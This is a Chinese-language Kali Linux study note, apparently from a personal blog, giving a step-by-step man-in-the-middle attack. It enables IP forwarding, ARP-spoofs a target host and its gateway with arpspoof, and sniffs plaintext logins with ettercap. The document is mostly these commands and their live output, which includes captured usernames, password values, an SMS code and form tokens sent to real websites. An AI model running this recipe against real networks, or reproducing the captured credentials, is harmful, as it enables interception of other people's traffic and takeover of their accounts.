@websec007
2018-08-08T17:16:54.000000Z
字数 2722
阅读 2393
kali学习
工具收集
(1)echo 1 > /proc/sys/net/ipv4/ip_forward
开启本地IP数据转发;
(2)arpspoof
实现 arp 网关欺骗;
(3)Ettercap -Tq -i eth0
以文本静态模式进行eth0 接口流量的解析,实现明文的密码抓取;
注:(1)(2)主要目的实现中间人攻击,(3)Ettercap工具的作用就是实现流量中明文密码的抓取;
(1)目标主机:192.168.31.123
(2)网关地址:192.168.31.1
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# arpspoof -i eth0 -t 192.168.31.123 192.168.31.1
0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
0:c:29:3:9:67 8:60:6e:c8:75:c4 0806 42: arp reply 192.168.31.1 is-at 0:c:29:3:9:67
....
不断的向网段中发送arp广播,告诉主机192.168.31.123目标网关地址的mac地址是kali主机的网卡地址,从而达到欺骗目标主机,为实现中间人攻击准备好前奏。
root@kali:~# ettercap -Tq -i eth0
ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team
Listening on:
eth0 -> 00:0C:29:03:09:67
192.168.31.5/255.255.255.0
fe80::20c:29ff:fe03:967/64
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
33 plugins
42 protocol dissectors
57 ports monitored
16074 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
1 hosts added to the hosts list...
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 122.115.47.39:80 -> USER: account PASS: 3910298f457443292bd5c55f6e5f7955 INFO: http://www.antian365.com/forum.php
CONTENT: fastloginfield=username&username=myles&password=3910298f457943393bd5c55f6e5f7955&quickforward=yes&handlekey=ls
DHCP: [D4:97:0B:8B:EF:32] REQUEST 192.168.31.217
HTTP : 58.216.109.182:80 -> USER: PASS: password@123 INFO: http://www.jianshu.com/users/password/mobile_reset
CONTENT: utf8=%E2%9C%93&authenticity_token=dYEmtPe3i5IMls5ZlWXOjHRJq3njZw%2BJcFXUb%2BAVHjh6dc2DaCHRYUA5Ncx991ohGHBDe5UmxIbCelq2s5mpfA%3D%3D&mobile_number=153xxxxxx&country_code=CN&force_user_exist=true&sms_code=099443&captcha%5Bvalidation%5D%5Bchallenge%5D=035735baab7de19d874f29005210ab7c64&captcha%5Bvalidation%5D%5Bgt%5D=a10ea6a23a441db3d956598988dff3c4&captcha%5Bvalidation%5D%5Bvalidate%5D=b0e792abf42d9bc79be5d69c0524c036&captcha%5Bvalidation%5D%5Bseccode%5D=b0e792abf42d9bc79be5d69c0524c036%7Cjordan&captcha%5Bid%5D=8d039d96-7b0c-4c03-bf0d-2534efe82e17&geetest_challenge=035735baab7de19d874f29005210ab7c64&geetest_validate=b0e792abf42d9bc79be5d69c0524c036&geetest_seccode=b0e792abf42d9bc79be5d69c0524c036%7Cjordan&password=msfadmin%2321&password_confirmation=msfadmin%2321&commit=%E9%87%8D%E7%BD%AE%E5%AF%86%E7%A0%81